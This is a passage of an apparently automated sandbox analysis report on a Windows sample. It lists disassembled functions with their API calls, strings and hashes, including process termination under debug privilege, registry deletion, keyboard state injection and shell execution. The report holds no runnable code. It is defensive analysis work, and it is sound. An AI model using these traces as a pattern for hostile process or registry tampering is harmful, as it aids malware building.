                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            • Opcode ID: f7997c1abf329fd13791d5c4621ef252108798a4cf5405d200a1b697320974ea
                            • Instruction ID: a8cd62af4983294c2f9a96333018d66e64858c6bb2c9f2807b7abda2e01eb3ed
                            • Opcode Fuzzy Hash: f7997c1abf329fd13791d5c4621ef252108798a4cf5405d200a1b697320974ea
                            • Instruction Fuzzy Hash: EF419E71A00348AFEF219FA5CC85BEE77E8EF09350F10452AF589A7292D7719984CB60
                            Function 000E1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000C6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6F7D
                              • Part of subcall function 000C6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6F8D
                              • Part of subcall function 000C6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C7022
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E168B
                            • GetLastError.KERNEL32 ref: 000E169E
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E16CA
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E1746
                            • GetLastError.KERNEL32(00000000), ref: 000E1751
                            • CloseHandle.KERNEL32(00000000), ref: 000E1786
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            • Opcode ID: da47f3002d2718333f6171112dbe8e8c3f866be585a3488f3f437a6865acc268
                            • Instruction ID: bde114f4deed7f02fe084095851a2c38fa3f1e0c40ec9f273513a83ff4163ac7
                            • Opcode Fuzzy Hash: da47f3002d2718333f6171112dbe8e8c3f866be585a3488f3f437a6865acc268
                            • Instruction Fuzzy Hash: 1D41CA71604201AFDB14EF94C8A6FEDB7A5AF54704F098059F946AF293EBB4E840CB81
                            Function 000C6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadIconW.USER32(00000000,00007F03), ref: 000C62D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            • Opcode ID: ced1e7c1ded190620b907f71a98d75181c4bd2658460bda6885b399217bb5c43
                            • Instruction ID: dd950d44b1767bf4e03dc18b0a4ef358cd3eb163666f2d0ca9a6d028d9781ace
                            • Opcode Fuzzy Hash: ced1e7c1ded190620b907f71a98d75181c4bd2658460bda6885b399217bb5c43
                            • Instruction Fuzzy Hash: 6011DD75208752BED7255B94DC43FEE77EC9F1A724F10002DF541A66C2E7A26A404169
                            Function 000C757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 000C7595
                            • LoadStringW.USER32(00000000), ref: 000C759C
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000C75B2
                            • LoadStringW.USER32(00000000), ref: 000C75B9
                            • _wprintf.LIBCMT ref: 000C75DF
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C75FD
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 000C75DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: 077c89cedf70c978d0f3f6eb7aaf2f2677a18ca17880f6f31342c43a4bedff58
                            • Instruction ID: b6f2a4f90888a8c31e8e196767df4a1be7d0d91017fddc037a50d70523963451
                            • Opcode Fuzzy Hash: 077c89cedf70c978d0f3f6eb7aaf2f2677a18ca17880f6f31342c43a4bedff58
                            • Instruction Fuzzy Hash: 4C011DF2904218BFE711A7E4AD89EEA776CDB08301F0044A5B746E2041EAB59EC48B75
                            Function 000E2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2AE7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharConnectRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3479070676-0
                            • Opcode ID: 19de138309b6ecb28e669d4b125c3b79dc6770740c1e729c9d0075f0aedf4942
                            • Instruction ID: eaccf4351b240b17723db8cff79cf5d34778ee6bb24679d09a615627d7cb0dee
                            • Opcode Fuzzy Hash: 19de138309b6ecb28e669d4b125c3b79dc6770740c1e729c9d0075f0aedf4942
                            • Instruction Fuzzy Hash: 9D916A71204201AFCB04EF55C895BAEB7E9FF88310F14881DF596A72A2DB74E945CF42
                            Function 000AB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __mtinitlocknum.LIBCMT ref: 000AB744
                              • Part of subcall function 000A8A0C: __FF_MSGBANNER.LIBCMT ref: 000A8A21
                              • Part of subcall function 000A8A0C: __NMSG_WRITE.LIBCMT ref: 000A8A28
                              • Part of subcall function 000A8A0C: __malloc_crt.LIBCMT ref: 000A8A48
                            • __lock.LIBCMT ref: 000AB757
                            • __lock.LIBCMT ref: 000AB7A3
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00136948,00000018,000B6C2B,?,00000000,00000109), ref: 000AB7BF
                            • EnterCriticalSection.KERNEL32(8000000C,00136948,00000018,000B6C2B,?,00000000,00000109), ref: 000AB7DC
                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 000AB7EC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                            • String ID:
                            • API String ID: 1422805418-0
                            • Opcode ID: c6efd49490ed4a0fc1fdddde92181aa578ba6cb603f9c236bc6eb6f5c1f2872c
                            • Instruction ID: 79959f92619cd432d9367b11756c9d7e140c4eaca45921378ee64885943f3d39
                            • Opcode Fuzzy Hash: c6efd49490ed4a0fc1fdddde92181aa578ba6cb603f9c236bc6eb6f5c1f2872c
                            • Instruction Fuzzy Hash: F7410971D042159BEB109FFCD8443ACB7A4BF47325F148228E529AB6E3DBB89941CB90
                            Function 000CA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 000CA1CE
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000CA205
                            • EnterCriticalSection.KERNEL32(?), ref: 000CA221
                            • _memmove.LIBCMT ref: 000CA26F
                            • _memmove.LIBCMT ref: 000CA28C
                            • LeaveCriticalSection.KERNEL32(?), ref: 000CA29B
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000CA2B0
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 000CA2CF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            • Opcode ID: 1a33cc3a3c439ecf6b786cdcb2430f7304abebdb5f658a8facb6a8a10e496339
                            • Instruction ID: d34b792f738c7286374c637e44606912e59fddb61ab8ee1fa906a069376a1e29
                            • Opcode Fuzzy Hash: 1a33cc3a3c439ecf6b786cdcb2430f7304abebdb5f658a8facb6a8a10e496339
                            • Instruction Fuzzy Hash: 97316171A00109EBCB00DF94DC85EAEB7B8FF45310B1480A9F905AB256DB70DD54DBA1
                            Function 000E8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 000E8CF3
                            • GetDC.USER32(00000000), ref: 000E8CFB
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000E8D06
                            • ReleaseDC.USER32(00000000,00000000), ref: 000E8D12
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 000E8D4E
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000E8D5F
                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000EBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 000E8D99
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000E8DB9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: d229763354aba58de06b677613e144713710e223ec8e44aef1580dbbda0c0999
                            • Instruction ID: 2f59246c3ddeb22b0044d0af3a4e752a288f313bf9d37adc88c753a3ca00c796
                            • Opcode Fuzzy Hash: d229763354aba58de06b677613e144713710e223ec8e44aef1580dbbda0c0999
                            • Instruction Fuzzy Hash: BD316D72200254BFEB108F91DC49FEA3FA9EF49755F044055FE48AA191CAB59841CB70
                            Function 000D1BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                            • _wcstok.LIBCMT ref: 000D1D6E
                            • _wcscpy.LIBCMT ref: 000D1DFD
                            • _memset.LIBCMT ref: 000D1E30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: 1cab8268c553d0412f58ed4f3d9f279f76efec50826896d617ab8d48271936ac
                            • Instruction ID: d43a565757a720ba8330f3a0079354e0678691b0c6c713b932b7f3c18780aec6
                            • Opcode Fuzzy Hash: 1cab8268c553d0412f58ed4f3d9f279f76efec50826896d617ab8d48271936ac
                            • Instruction Fuzzy Hash: F6C12831508301AFD764EF64C885ADAB7E4BF85310F10492EF89A973A2DB70ED45CB92
                            Function 0009B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16fa7b74ae49ac4842830bc90c35436d5c7280853d5574b88575c9775d77482b
                            • Instruction ID: cbdb4a66dc845eb5c0fe97497b1b86a799ce2d6f78b84f4e4d97b3e0091e71fc
                            • Opcode Fuzzy Hash: 16fa7b74ae49ac4842830bc90c35436d5c7280853d5574b88575c9775d77482b
                            • Instruction Fuzzy Hash: DC717C71900509EFCF14CF98DD88ABEBBB4FF85324F148159F915AA252C734AA51EFA0
                            Function 000E2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000E214B
                            • _memset.LIBCMT ref: 000E2214
                            • ShellExecuteExW.SHELL32(?), ref: 000E2259
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                            • CloseHandle.KERNEL32(00000000), ref: 000E2320
                            • FreeLibrary.KERNEL32(00000000), ref: 000E232F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 4082843840-2766056989
                            • Opcode ID: 63c48c095b041ce94a97269273006c578ef7560c19a5003858ad464f3c7abd07
                            • Instruction ID: 584ff844457fc4da5d10d98ffc9a24514c7f142235a9c06db1015a3e61c2879f
                            • Opcode Fuzzy Hash: 63c48c095b041ce94a97269273006c578ef7560c19a5003858ad464f3c7abd07
                            • Instruction Fuzzy Hash: B2716975A006199FCF04EFA5C9959AEB7F9FF48310B108059E896BB352DB30AE40CB90
                            Function 000C47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(?), ref: 000C481D
                            • GetKeyboardState.USER32(?), ref: 000C4832
                            • SetKeyboardState.USER32(?), ref: 000C4893
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 000C48C1
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 000C48E0
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 000C4926
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000C4949
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: a6517c0b8a46ca5838a0414279d1d4c5afa568b9e7f37b05d417a553186086f6
                            • Instruction ID: c2ba232579cbc884e418942c4037eacfe2035762ad90e54a3a59dfe61d495ebc
                            • Opcode Fuzzy Hash: a6517c0b8a46ca5838a0414279d1d4c5afa568b9e7f37b05d417a553186086f6
                            • Instruction Fuzzy Hash: 96519FA0A087D53DFB7647248C65FBEBEE9BB06304F08858DE1D5568D2C6E8AC88D750
                            Function 000C45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(00000000), ref: 000C4638
                            • GetKeyboardState.USER32(?), ref: 000C464D
                            • SetKeyboardState.USER32(?), ref: 000C46AE
                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000C46DA
                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000C46F7
                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000C473B
                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000C475C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: c96163b82bd8e91774e76c223f600b6fd9beb93cb0f80a3288512dc6830d62ac
                            • Instruction ID: d468bd9ab00301fdda7142519b0b2ccc83ebf305f20791bf2f520a45aa6869e1
                            • Opcode Fuzzy Hash: c96163b82bd8e91774e76c223f600b6fd9beb93cb0f80a3288512dc6830d62ac
                            • Instruction Fuzzy Hash: AE51C2A09087D639FB3687248C65FBEBEE97B06304F08858DE1D5468C2D7D4EC98E751
                            Function 000C86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: 0c4dc4d65cafe75e6304d6d9ecacec4d9c670b6e33ca003acf37f447b5f2352e
                            • Instruction ID: 43917159014b39d0c5b4febfbb0e03d8033b378be9ca0442d43ba0d24075e815
                            • Opcode Fuzzy Hash: 0c4dc4d65cafe75e6304d6d9ecacec4d9c670b6e33ca003acf37f447b5f2352e
                            • Instruction Fuzzy Hash: B4412E75C1021475CB11EBF8C88AACFB7ACAF06310F508976E554F3162EE34E66587A9
                            Function 000D936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                            Download Yara Rule
                            APIs
                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0011DBF0), ref: 000D9409
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9416
                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 000D943A
                            • #16.WSOCK32(?,?,00000000,00000000), ref: 000D9452
                            • _strlen.LIBCMT ref: 000D9484
                            • _memmove.LIBCMT ref: 000D94CA
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D94F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLast$_memmove_strlenselect
                            • String ID:
                            • API String ID: 2795762555-0
                            • Opcode ID: 27344ed1bd2088fc1091d99431841ecf6b71fb0612d07d4c468a8a243c0c6567
                            • Instruction ID: 9ba01d372e7d2d58ce4f6e3286b0c51e01a26f8bbb1627092523736eb79b130b
                            • Opcode Fuzzy Hash: 27344ed1bd2088fc1091d99431841ecf6b71fb0612d07d4c468a8a243c0c6567
                            • Instruction Fuzzy Hash: F0417F75600208AFDB14EBA4DD85EEEB7B9EF48314F10416AF51697293DB30EE41CB61
                            Function 000E3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 000E3C92
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E3CBC
                            • FreeLibrary.KERNEL32(00000000), ref: 000E3D71
                              • Part of subcall function 000E3C63: RegCloseKey.ADVAPI32(?), ref: 000E3CD9
                              • Part of subcall function 000E3C63: FreeLibrary.KERNEL32(?), ref: 000E3D2B
                              • Part of subcall function 000E3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000E3D4E
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 000E3D16
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 722f2494248309c939433bbc7b5071825a14b38f093ddba2a7b229d67e99a795
